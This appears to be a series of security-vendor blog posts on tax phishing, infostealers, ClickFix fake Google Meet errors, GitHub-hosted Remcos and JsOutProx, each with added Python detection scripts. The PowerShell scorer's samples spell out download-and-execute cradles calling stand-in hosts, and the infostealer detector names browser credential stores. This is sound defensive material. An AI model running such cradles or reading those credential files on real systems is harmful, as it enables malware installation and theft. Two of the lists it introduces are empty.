Cybercriminals are exploiting the urgency of tax season to launch phishing scams aimed at stealing personal and financial data.

Once again, the tax filing deadline is fast approaching for Americans, and cybercriminals are preparing to take advantage of the seasonal chaos. Microsoft has recently issued a warning about a surge in tax-themed phishing campaigns targeting both individuals and businesses. These scams are designed to look convincing – often replicating official communications from the IRS or trusted tax companies – and are very successful at tricking people into revealing sensitive data or installing malware.

Luckily, Ophtek has your back and we’re here to give you some advice on how you can stay safe.

Understanding Tax-Related Phishing Scams

At the core of these scams are phishing emails which use urgency and fear to catch victims off guard and push them into taking an action. The emails may, for example, claim there’s a problem with your tax filing, warn of an audit, or promise that a tax refund is due. They often carry subject lines such as “EMPLOYEE TAX REFUND REPORT” or “Tax Strategy Update Campaign Goals”, and the attachments or links inside them, once opened, can install malicious software.

Typically, the emails also contain PDF attachments – with names such as lrs_Verification_Form_1773.pdf, where a lowercase L stands in for the I of IRS – which redirect users to a malicious website hosting malware. In certain cases, the emails instead include links or QR codes that send users to fake websites made to resemble genuine tax portals. The goal is simple: get users to enter their personal or financial details or download malware.

But not all of these phishing emails are easily identifiable as threatening or suspicious. Some start with relatively harmless messages to build trust. Once the target feels comfortable, follow-up emails are used to introduce more dangerous content. This makes it more likely the user will activate a malicious payload than they would with an email received out of the blue. A wide range of malware has been observed in these attacks, with GuLoader, AHKBot, and Brute Ratel C4 just a few of those involved.

Protect Your Finances and Your Tax Returns

The financial and personal impact of these attacks can be significant for victims. As well as the potential financial loss, those affected often face further headaches in the form of frozen credit, blacklisting, and stolen tax refunds. For businesses, the consequences can extend to data breaches, costly compliance violations, and significant downtime. Accordingly, you need to tread carefully during tax season and make sure you follow these best practices:

  • Verify Email Authenticity: Check the authenticity of every email you receive, especially those calling for urgent action. Look at the actual sender address, not just the display name, and watch for look-alike domains that swap or add characters, e.g. I-R-S@tax0ffice.com (a zero in place of the letter o). Bear in mind that the IRS does not initiate contact by email to request personal or financial information.
  • Be Careful of Attachments and Links: Never open attachments from unknown sources, as these can easily carry malware. Be equally careful with links: hover your mouse cursor over any suspicious link to reveal its real destination, and compare that domain with the organization’s genuine one (irs.gov, for example) rather than trusting the link text. If in doubt, type the known address into your browser yourself instead of clicking.
  • Keep Your Software Updated: Finally, make sure your software is always up to date with the latest security patches installed. This strengthens your cyber defenses and makes it much harder for threat actors to take advantage of software vulnerabilities.
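The checks above can be scripted for a help desk or mail gateway. The Python below is an added example (it is not from the original post or from Microsoft’s report): it parses a constructed sample message, folds the characters attackers swap for one another (a lowercase L for an i, a zero for an o, as in the lrs_ filename above), and flags a sender or attachment name that imitates a trusted brand without coming from a trusted domain, a Reply-To pointing somewhere else, pressure language, and attachment types that Windows executes directly, including script files. The trusted-domain and brand-token lists are assumptions to adapt to your own tax agencies and vendors.

```python
import re
from email import message_from_bytes, policy
from email.utils import parseaddr

# Assumed allowlists: adapt to the tax agencies and vendors you actually deal with.
TRUSTED_DOMAINS = {"irs.gov", "intuit.com"}
BRAND_TOKENS = {"irs", "revenue", "turbotax"}
# Attachment types that Windows will run directly (scripts, shortcuts, disk images, binaries).
EXEC_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".exe", ".scr",
             ".lnk", ".iso", ".img", ".bat", ".cmd", ".ps1"}
URGENCY = re.compile(r"action required|within \d+ hours|immediately|suspended|on hold|verify", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.[a-z0-9]{1,4}$", re.I)


def fold_confusables(text):
    """Collapse characters attackers swap for each other, so 'lrs' and '1rs' both fold to 'irs'."""
    text = text.lower()
    for src, dst in (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "i"), ("l", "i"), ("|", "i")):
        text = text.replace(src, dst)
    return text


def is_trusted(domain):
    return any(domain == t or domain.endswith("." + t) for t in TRUSTED_DOMAINS)


def imitates_brand(name):
    """True if any word of the folded name equals a brand token ('lrs_Form' -> 'irs', 'form')."""
    words = re.split(r"[^a-z]+", fold_confusables(name))
    return any(w in BRAND_TOKENS for w in words)


def triage(raw):
    """Return human-readable findings for one RFC 822 message; an empty list means nothing was flagged."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []

    display, from_addr = parseaddr(str(msg.get("From", "")))
    from_domain = from_addr.rpartition("@")[2].lower()
    if not is_trusted(from_domain):
        if imitates_brand(from_domain):
            findings.append(f"sender domain {from_domain} imitates a trusted brand")
        if imitates_brand(display):
            findings.append(f"display name '{display}' claims a trusted brand but sender domain is {from_domain}")

    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    reply_domain = reply_addr.rpartition("@")[2].lower()
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from sender domain {from_domain}")

    body = msg.get_body(preferencelist=("plain",))
    text = str(msg.get("Subject", "")) + " " + (body.get_content() if body else "")
    if URGENCY.search(text):
        findings.append("urgency/pressure language in subject or body")

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in EXEC_EXTS:
            findings.append(f"attachment {name} is a script or executable ({ext})")
        if DOUBLE_EXT.search(name):
            findings.append(f"attachment {name} hides its real type behind a double extension")
        if imitates_brand(name.rsplit(".", 1)[0]):
            findings.append(f"attachment name {name} imitates a trusted brand")
    return findings


# Constructed sample messages (invented for this example, not taken from the campaign).
PHISH_EML = b"""\
From: "Internal Revenue Service" <refunds@irs-tax0ffice.com>
Reply-To: claims@mail-verify.example
To: employee@company.example
Subject: EMPLOYEE TAX REFUND REPORT - action required within 24 hours
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Your refund is on hold. Open the attached form to confirm your identity.
--b1
Content-Type: application/pdf
Content-Disposition: attachment; filename="lrs_Verification_Form_1773.pdf"

%PDF-1.4 placeholder
--b1--
"""

CLEAN_EML = b"""\
From: "Payroll" <payroll@company.example>
To: employee@company.example
Subject: March timesheet reminder
Content-Type: text/plain

Please submit your timesheet by Friday.
"""

if __name__ == "__main__":
    for line in triage(PHISH_EML):
        print("PHISH:", line)
    print("CLEAN:", triage(CLEAN_EML))
```

The folding step is deliberately crude (it treats every l and 1 as an i), so it is a triage signal rather than a verdict: the point is that a human will read lrs_Verification_Form as IRS, and the script should see it the same way.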

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More


Infostealer malware is frequently referenced as the go-to weapon for threat actors, but what is it? And how do you protect your IT systems from it?

You only have to take a quick look over the Ophtek blog to understand the popularity of infostealers in modern hacking. From fake Zoom sites through to SnipBot and SambaSpy, threat actors are determined to get their hands on your sensitive data. Infostealers, therefore, present an everyday threat to PC users and it’s crucial you understand their methods and impact.

Luckily, Ophtek has your back, and we’re going to take a deep dive into infostealers to equip you with the knowledge you need to stay safe.

What is an Infostealer?

The main objective of all infostealer malware is to harvest confidential data from a compromised system. With this stolen data, threat actors have the opportunity to commit numerous crimes, such as identity theft or financial fraud. This makes infostealer malware a serious threat, especially in the age of big data, where organizations hold huge amounts of data on their IT systems. As with most modern malware, infostealers have strong stealth capabilities, allowing them to operate in the background without being detected and so increasing their impact.

The Danger Behind Infostealers

Infostealers can be individual malware threats or part of a more extensive suite of malware applications. Whatever their method, infostealers tend to focus on stealing the following data:

  • System login credentials
  • Social media and email passwords
  • Bank details
  • Personal details

All of these data categories have the potential for serious damage, e.g. hacking someone’s personal email and reading confidential information, or clearing out someone’s bank account. From a business perspective, stolen credentials also give infostealers a route into secure areas of your IT infrastructure, compromising the operations of your business. All of this data is harvested from infected machines and then discreetly transmitted to a remote server controlled by the threat actors.
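That last sentence describes the behaviour a defender can look for: a process that is not a browser reads the browser’s credential stores and then talks to the internet. The Python below is an added example (not from the original post) that runs that rule over constructed, Sysmon-style endpoint events. The file paths are the real locations of the Chrome and Firefox credential stores; the event tuples, hostnames and addresses are invented for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Files infostealers go after; extend with wallet and password-manager paths as needed.
CRED_STORES = re.compile(
    r"\\User Data\\[^\\]+\\(Login Data|Web Data|Network\\Cookies)$"
    r"|\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db)$"
    r"|\\\.ssh\\id_[a-z0-9]+$", re.I)
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
EXFIL_WINDOW = timedelta(minutes=10)   # how soon after the read an outbound connection counts


def is_browser(image):
    """Name alone is spoofable (malware can call itself chrome.exe), so also require the install
    location. A signer check on the binary is the stronger control if your telemetry carries it."""
    folder, _, exe = image.rpartition("\\")
    return exe.lower() in BROWSER_IMAGES and folder.lower().startswith("c:\\program files")


def detect(events):
    """events: (timestamp, host, pid, image, kind, target). One alert per non-browser process that
    read a credential store; severity is raised if it also connected out within EXFIL_WINDOW."""
    reads, conns = defaultdict(list), defaultdict(list)
    for ts, host, pid, image, kind, target in events:
        t = datetime.fromisoformat(ts)
        if kind == "file_read" and CRED_STORES.search(target):
            reads[(host, pid, image)].append((t, target))
        elif kind == "net_connect":
            conns[(host, pid, image)].append((t, target))
    alerts = []
    for (host, pid, image), rs in reads.items():
        if is_browser(image):
            continue   # browsers legitimately open their own stores
        first = min(t for t, _ in rs)
        outbound = [d for t, d in conns.get((host, pid, image), [])
                    if first <= t <= first + EXFIL_WINDOW]
        alerts.append({"host": host, "pid": pid, "image": image,
                       "stores": sorted({p for _, p in rs}),
                       "outbound": outbound,
                       "severity": "high" if outbound else "medium"})
    return alerts


# Constructed telemetry: a browser doing normal work, then a dropper in %TEMP% sweeping
# Chrome and Firefox stores and calling home. Hosts, PIDs and addresses are invented.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
DROPPER = r"C:\Users\amy\AppData\Local\Temp\update.exe"
PROFILE = r"C:\Users\amy\AppData\Local\Google\Chrome\User Data\Default"
EVENTS = [
    ("2025-03-10T09:00:01", "pc1", 4120, CHROME,  "file_read",   PROFILE + r"\Login Data"),
    ("2025-03-10T09:00:05", "pc1", 4120, CHROME,  "net_connect", "142.250.74.78:443"),
    ("2025-03-10T09:05:10", "pc1", 5532, DROPPER, "file_read",   PROFILE + r"\Login Data"),
    ("2025-03-10T09:05:11", "pc1", 5532, DROPPER, "file_read",   PROFILE + r"\Network\Cookies"),
    ("2025-03-10T09:05:12", "pc1", 5532, DROPPER, "file_read",
     r"C:\Users\amy\AppData\Roaming\Mozilla\Firefox\Profiles\k3x9.default\logins.json"),
    ("2025-03-10T09:05:13", "pc1", 5532, DROPPER, "file_read",   r"C:\Users\amy\Documents\notes.txt"),
    ("2025-03-10T09:05:20", "pc1", 5532, DROPPER, "net_connect", "203.0.113.45:443"),
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Keying on the process rather than on individual file reads is what keeps this usable: one alert says "update.exe read three credential stores and connected to 203.0.113.45 ten seconds later", which is the shape of an infostealer, rather than three separate file-access events that look like noise on their own.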

How Do Infostealers Strike?

Threat actors have developed numerous strategies to launch successful infostealer attacks with the two most common methods being:

Protecting Your Systems Against Infostealers

Despite the threat of infostealers, it’s relatively easy to stay safe and protect your systems from them. All you need to do is follow these best practices:

  • Be Wary of Suspicious Emails: Any emails which ring even the slightest alarm bell should be closely scrutinized. If something about the wording doesn’t sound quite right, or there’s a sense of urgency to commit to an action, the chances are that this could be a phishing email. In these instances, don’t click anything and, instead, contact an IT professional to review the content.
  • Always Update Your Software: One of the easiest ways for threat actors to deploy infostealers on your system is through software vulnerabilities. No piece of software is perfect, and they often contain weak spots which can be exploited. However, as these vulnerabilities are picked up by the developers, security patches are issued to remedy these weak spots. Accordingly, installing these updates should be a major priority.
  • Install Security Software: There are numerous security packages available such as AVG and Kaspersky which monitor your systems in real time and can block malware threats instantly. This automatic defense enables you to stay safe from infostealers and keeps your networks healthy and productive.

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More


Hackers have designed fake Google Meet error pages to distribute info-stealing malware which can compromise all the data on a network.

It feels as though malicious websites are springing up on a daily basis, and with 12.8 million websites infected with malware, this is a fair assumption to make. The latest attack under the Ophtek spotlight centers around Google Meet, a videoconferencing service hosted online by Google. The threat uses fake connectivity errors to lure victims into inadvertently launching the malware on their own system. And with Google Meet having over 300 million active users every month, the chance of this campaign tripping people up is exceptionally high.

The Danger of Fake Google Meet Pages

The Google Meet attack appears to be part of a wider hacking campaign known as ClickFix, which has also been identified using similar fake websites impersonating Google Chrome and Facebook. In all these cases, the objective of the campaign is to install infostealers onto victims’ PCs. Malware used in these attacks includes DarkGate and Lumma Stealer.

Fake error messages are displayed in victims’ web browsers to indicate a connectivity issue with a Google Meet call. However, there is no Google Meet call taking place; it’s simply a ruse to deceive victims into following through on a malicious call-to-action. These ‘errors’ tell the user to copy a ‘fix’ and run it in Windows PowerShell, the command shell and scripting environment built into Windows and commonly used by administrators to automate tasks.

Unfortunately, rather than fixing the ‘error’ with Google Meet, the execution of this code within PowerShell simply downloads and installs the malware. Once installed, malware such as DarkGate and Lumma Stealer has the potential to search out sensitive data on your network, establish remote network connections, and transmit stolen data out of your network.
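The pasted ‘fix’ leaves a trace: the command line ends up in process-creation telemetry (and in the Run dialog’s history) and carries the tell-tale features of a download cradle. The Python below is an added example (not from the original post or the ClickFix research): it scores constructed PowerShell command lines against a small set of indicators and decodes a -EncodedCommand argument before scoring it, since that is the usual way of hiding the cradle. The sample command lines, hostnames and addresses are invented; the indicator list is a starting point, not a complete one.

```python
import base64
import re

INDICATORS = [
    ("encoded command",     re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I)),
    ("download cradle",     re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
                                       r"downloadfile|curl|wget|bitsadmin|certutil)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("hidden window",       re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy bypass",       re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("lolbin launcher",     re.compile(r"\b(?:mshta|wscript|cscript|rundll32|regsvr32)\b", re.I)),
    # ClickFix pages often pad the pasted text with reassuring words; heuristic, expect false hits.
    ("lure wording",        re.compile(r"fix|not a robot|captcha|verif", re.I)),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded(cmd):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or '' if absent or invalid."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_cmdline(cmd):
    """Sorted names of the indicators present in the command line, including inside any decoded payload."""
    text = cmd + " " + decode_encoded(cmd)
    return sorted(name for name, rx in INDICATORS if rx.search(text))


# Constructed command lines (invented): a plain cradle, the same idea base64-encoded, and a benign one.
PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/meet-fix.ps1")'
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLES = [
    'powershell -w hidden -ep bypass -c "iex (irm https://meet-google.example/fix.txt)"',
    f"powershell.exe -nop -w hidden -enc {ENCODED}",
    "powershell -Command Get-Date",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(triage_cmdline(cmd), "<-", cmd[:60])
```

Any one indicator on its own is weak (administrators do use -w hidden), but a command line that combines a download cradle with in-memory execution, pasted by an ordinary user shortly after a browser visit, is worth an alert regardless of what the page claimed it would fix.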

Victims are redirected to these malicious websites via phishing emails, which claim to contain instructions for joining important virtual meetings and webinars. The URLs used within the emails appear like genuine Google Meet links but take advantage of slight differences in the address to deceive recipients.

Protecting Yourself from Fake Google Meet Malware

The best way to stay safe in the face of the fake Google Meet pages (and similar attacks) is by being proactive and educating your staff on the threats of malicious websites. Accordingly, following these best practices gives you the best chance of securing your IT infrastructure:

  • Double Check URLs: malicious websites often mimic genuine ones to catch people off guard. Therefore, always inspect a URL for anything unusual, such as misspelled words, unexpected extra subdomains, or unusual domain endings, before clicking it. This minimizes your risk of falling victim to phishing and malware attacks. Likewise, never paste a command from a web page into PowerShell or the Run dialog: no genuine Google Meet error is fixed that way.
  • Use Browser Security Features: many browsers, such as Google Chrome, come with built-in security features which can block sites known to be harmful or detect suspicious downloads. If you have these protections enabled, and this is easily done through your browser settings, you can rest assured you’re putting a strong security measure in place.
  • Install Antivirus and Firewall Software: one of the simplest ways to protect yourself is by installing antivirus and firewall software, which is often available for free in the form of AVG and Kaspersky. This software can not only detect malware, but also block it before it reaches your system, so it can be considered a very strong form of defense.

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More


A new malware campaign, targeting finance and insurance sectors, is using infected GitHub repositories to distribute the Remcos remote access trojan (RAT).

GitHub is an online platform which allows software developers to store and share code online. It’s like an online hard drive, but one which is specifically dedicated to coding projects. Its main use is to foster collaboration between developers and to track changes in their code as it evolves. However, because it’s a trusted source, it makes a perfect target for hackers. On this occasion, the threat actors haven’t been creating malicious repositories. Instead, they’ve been taking advantage of the comments section in legitimate repositories.

The Dangers of GitHub Comments

The GitHub attack in question appears to be targeting genuine open-source repositories, with those affected including HMRC, Inland Revenue, and UsTaxes. These are well-known and trusted repositories. Users wouldn’t expect to be infected by malware while visiting them, whereas lesser-known and newer repositories pose a more obvious risk. So, how are the threat actors abusing these repositories? They’re uploading malware files as attachments in the comments section.

Even if the comment is later deleted, the uploaded file remains available at its original link. Phishing emails are then used to direct users to that link on GitHub. Because GitHub is a genuine, trusted platform, these phishing emails are far less likely to be flagged as suspicious. This puts the recipient at risk of unknowingly downloading and executing the Remcos RAT. This RAT allows threat actors to remotely take control of an infected PC. From there, they can steal your data, execute further commands on your system, and monitor all your activity. This makes the attack highly dangerous, and it follows in the footsteps of numerous GitHub attacks over the last year.
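The practical lesson is that "it’s on github.com" says nothing about who put the file there. A link to a repository’s own code or to a release is published by the project; a link to a file uploaded through a comment box is published by whoever wrote the comment. The Python below is an added example (not from the original post or from the research it reports on) that tells those cases apart from the URL alone and also catches two tricks the page warns about: look-alike hosts and the user@host form that makes a URL start with github.com while actually pointing elsewhere. The attachment path shapes are the ones observed at the time of writing and should be treated as an assumption to re-check; the sample URLs are invented.

```python
from urllib.parse import urlsplit

GITHUB_HOSTS = {"github.com", "www.github.com"}
RAW_HOSTS = {"raw.githubusercontent.com", "objects.githubusercontent.com"}
# Path shapes of files uploaded through the comment box (assumption based on observed links):
#   /<owner>/<repo>/files/<id>/<name>      older style
#   /user-attachments/files/<id>/<name>    newer style
RISKY_EXTS = {".zip", ".rar", ".7z", ".iso", ".img", ".exe", ".msi", ".js", ".vbs", ".hta", ".lnk", ".scr"}


def fold_host(host):
    """Collapse look-alike characters so 'g1thub.com' and 'glthub.com' read as 'github.com'."""
    for src, dst in (("1", "i"), ("l", "i"), ("0", "o"), ("rn", "m")):
        host = host.replace(src, dst)
    return host


def classify(url):
    """Return {'host', 'kind', 'reasons'} for a link that claims to be on GitHub."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    parts = [p for p in u.path.split("/") if p]
    reasons = []
    if u.username is not None:
        # https://github.com@evil.example/... : everything before '@' is userinfo, not the host.
        reasons.append("userinfo before the host (user@host trick): the real host is " + host)
    if host in RAW_HOSTS:
        kind = "raw_content"
    elif host not in GITHUB_HOSTS:
        kind = "lookalike" if "github" in fold_host(host) else "other"
    elif parts[:2] == ["user-attachments", "files"] or (len(parts) > 2 and parts[2] == "files"):
        kind = "comment_attachment"
        reasons.append("file uploaded through a comment box: not part of the repository's code or releases")
    elif len(parts) > 3 and parts[2:4] == ["releases", "download"]:
        kind = "release_asset"
    else:
        kind = "repo_page"
    if parts and "." in parts[-1]:
        ext = "." + parts[-1].rsplit(".", 1)[-1].lower()
        if ext in RISKY_EXTS:
            reasons.append(f"link serves a {ext} file")
    return {"host": host, "kind": kind, "reasons": reasons}


# Constructed links (owner, repo and hosts are invented for the example).
SAMPLE_LINKS = [
    "https://github.com/owner/repo/files/12345/Invoice.zip",
    "https://github.com/user-attachments/files/777/report.pdf",
    "https://github.com/owner/repo/releases/download/v1.0/tool.zip",
    "https://github.com/owner/repo/blob/main/README.md",
    "https://github.com@evil.example/owner/repo/files/1/x.zip",
    "https://glthub.com/owner/repo",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(classify(link), "<-", link)
```

A mail filter can use the "comment_attachment" verdict directly: an email from outside the company that links to a comment-box upload on a tax-software repository has no legitimate business reason to exist, however trustworthy the hostname looks.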

Staying Safe from Malicious Comments

Your employees may not have anything to do with software development, but the Remcos RAT relies on phishing techniques which could easily deceive them. Therefore, you need to ensure your employees stay safe from this innovative threat. The best way to achieve this is by following these best practices:

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More


A new phishing campaign, launched in March 2024, has been targeting financial firms all over the world with the JsOutProx banking trojan.

The JsOutProx malware campaign was first detected by Visa, whose Payment Fraud Disruption team sent out security alerts to stakeholders about the threat. So far, the targets of the attack have been based in Africa, South Asia, and the Middle East. The identity of the threat actors behind the attack is currently unknown, but it’s speculated they may be China-based or receiving support from China.

Financial malware always has the potential to cause great damage to organizations and individuals, so it’s important you understand the threat posed by JsOutProx.

The Lowdown on JsOutProx

First detected online in 2019, JsOutProx provides remote access to infected PCs by way of a JavaScript backdoor. This foothold allows threat actors to carry out numerous malicious attacks within the infected system. These include downloading further malware, data harvesting, taking screenshots, executing files, and embedding itself deep within the target. Plugins are utilized to launch these attack methods, an indicator this is a sophisticated piece of malware.

JsOutProx relies on JavaScript to carry out its attacks, and this choice helps it deceive targets. Whereas many PC users understand the risk posed by certain file types – such as a Word document or an .exe file – they’re less likely to recognise the threat posed by a JavaScript file, which Windows will run just as readily. Additionally, obfuscated JavaScript is difficult for many anti-malware tools to inspect, so it has the potential to go undetected by software expected to keep PCs secure.

How is the JsOutProx Attack Launched?

Using phishing email techniques, JsOutProx is distributed through emails purporting to be MoneyGram or SWIFT payment notifications. However, far from coming from genuine financial institutions, the senders behind these emails have only malicious intentions. Once a recipient has taken the bait, the JsOutProx code executes and allows the threat actors to establish themselves on the infected PC. Once installed, JsOutProx takes a number of steps to strengthen its position, such as changing DNS settings, editing proxy settings, and bypassing User Account Control (UAC).

Protect Your PCs from JsOutProx

A significant proportion of internet users have access to online banking services, which gives JsOutProx a very large pool of potential victims. Thankfully, you don’t have to fall victim to JsOutProx and compromise the security of your PC. All you have to do is make sure you practice the following:

  • Protect your browsers from scripts: many malware attacks such as JsOutProx rely on scripts to launch their attack within browsers. Therefore, it makes sense to protect your browsers from malicious scripts. Luckily, this is a relatively simple task thanks to ready-made browser plugins such as ScriptSafe for Chrome. These browser extensions protect you by blocking unwanted content and providing alerts against blacklisted sites which are malicious.

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More
